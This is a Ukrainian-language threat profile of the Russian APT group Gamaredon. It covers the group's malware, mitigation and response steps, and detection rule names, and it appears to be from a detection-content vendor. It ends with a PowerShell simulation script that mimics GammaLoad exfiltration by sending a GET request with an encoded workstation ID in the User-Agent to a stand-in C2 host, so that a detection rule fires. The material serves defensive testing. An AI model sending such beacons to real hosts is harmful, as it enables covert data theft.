Профіль APT Gamaredon (Primitive Bear) з мапінгом MITRE ATT&CK
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Gamaredon – це група загроз розширеної стійкості, пов’язана з Росією, активна з 2013 року і приписується російській ФСБ. Група зосереджена на кібер-шпигунстві та крадіжці даних, з основними цілями, спрямованими на українські урядові та оборонні організації. Її операції спираються на спеціальні сімейства зловмисного ПЗ, такі як GammaLoad і GammaSteel, підтримані різними методами маскування та збереження доступу.
Розслідування
Звіт розглядає кампанії з 2013 по 2025 рік і підкреслює перехід групи до використання Cloudflare Workers, API Telegram і експлуатації вразливостей WinRAR. Він також відстежує розвиток Gamaredon від спеціальних дроперів VBScript до більш просунутих засобів крадіжки інформації на основі PowerShell і шпигунського ПЗ для мобільних пристроїв.
Пом’якшення
Рекомендовані заходи з пом’якшення включають виправлення WinRAR для вирішення CVE-2025-8088 і моніторинг підозрілих виконань PowerShell. Організації також повинні посилити контроль за знімними носіями, стежити за незвичайними запланованими завданнями та перевіряти захисні засоби проти відомих TTP Gamaredon через платформи симуляції та тестування.
Відповідь
Якщо активність Gamaredon виявлена, хто проводить розслідування, повинен негайно ізолювати уражені хости, особливо системи, які показують ознаки GammaSteel або Ptero* активності шкідливого ПЗ. Розслідувачі повинні перевірити стійкість на основі реєстру, оглянути заплановані завдання на наявність несанкціонованих записів і провести загальний пошук підозрілого вихідного трафіку до інфраструктури, пов’язаної з Cloudflare або Telegram.
Потік Атак
Виявлення
Виклик підозрілих методів .NET з Powershell (через powershell)
Переглянути
Можливі точки збереження [ASEP – Hive Software/NTUSER] (через об’єкт реєстру)
Переглянути
Можливе ексфільтрація даних через Rclone Tool (через командний рядок)
Переглянути
Завантаження або вивантаження через Powershell (через командний рядок)
Переглянути
Виклик підозрілих класів/методів .NET з командного рядка Powershell (через процес створення)
Переглянути
Schtasks вказує на підозрілий каталог/бінарний файл/скрипт (через командний рядок)
Переглянути
LOLBAS WScript / CScript (через процес створення)
Переглянути
Підозріла уникнення захисту LOLBAS MSHTA через виявлення пов’язаних команд (через процес створення)
Переглянути
Підозрілі бінарні файли/скрипти в розташуваннях автозапуску (через файл подію)
Переглянути
Можлива спроба експлуатації CVE-2025-8088 / CVE-2025-6218 (вразливість WinRAR) (через файл подію)
Переглянути
Можлива служба динамічного DNS контактувала (через dns)
Переглянути
Виявлення запитів Gamaredon GammaLoad з ексфільтрацією User-Agent [Windows Network Connection]
Переглянути
Завантажувач Powershell через ярлик LNK з обфускацією [Windows Powershell]
Переглянути
## Виконання симуляції
Передумова: необхідно, щоб перевірка телеметрії та базового стану перед запуском виконалась успішно.
Аргументація: цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для виклику правила виявлення. Команди та нарратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та створювати точну телеметрію, очікувану за логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкових діагнозів.
-
Опис атаки та команди: Супротивник встановив опорний пункт на
WORKSTATION01. Щоб ексфільтрувати метадані системи (такі як імена хостів або користувачів) без активації традиційного фільтрації файлів, вони використовують спеціальне впровадження шкідливого ПЗ GammaLoad. Це шкідливе ПЗ виконує запити HTTP GET до віддаленого сервера управління та контролю (C2). Замість того, щоб розміщувати дані в URI або тілі POST, шкідливе ПЗ вбудовує закодовану ідентичність робочої станції в заголовокUser-Agent:::WORKSTATION01_encoded_data. Це дозволяє даним обійти просте фільтрування URL, залишаючись прихованими в стандартному веб-трафіку. -
Скрипт регресійного тесту: Цей скрипт використовує PowerShell для симуляції конкретного запиту HTTP GET з шкідливим рядком User-Agent, необхідним для виклику правила.
# Симуляція ексфільтрації User-Agent у GammaLoad $TargetUrl = "http://example-c2-server.com/api/check" $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST" Write-Host "[*] Початок симуляції: відправлення запиту GET з шкідливим User-Agent..." -ForegroundColor Cyan try { $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET Write-Host "[+] Запит успішно відправлено. Перевірте SIEM для попередження." -ForegroundColor Green } catch { # Ми очікуємо на помилку підключення, якщо URL не існує, # але User-Agent все ще буде записаний проксі. Write-Host "[!] Спроба запиту (Примітка: помилка підключення очікується, якщо URL є недійсним, але проксі-логи повинні все ще записувати UA)." -ForegroundColor Yellow } -
Команди очищення: Оскільки ця симуляція лише генерує тимчасовий мережевий трафік і не змінює системні файли або ключі реєстру, очищення не потрібно.
# Жодних змін у системі не було. Симуляція завершена. Write-Host "[*] Очищення: слідів на хості немає." -ForegroundColor Green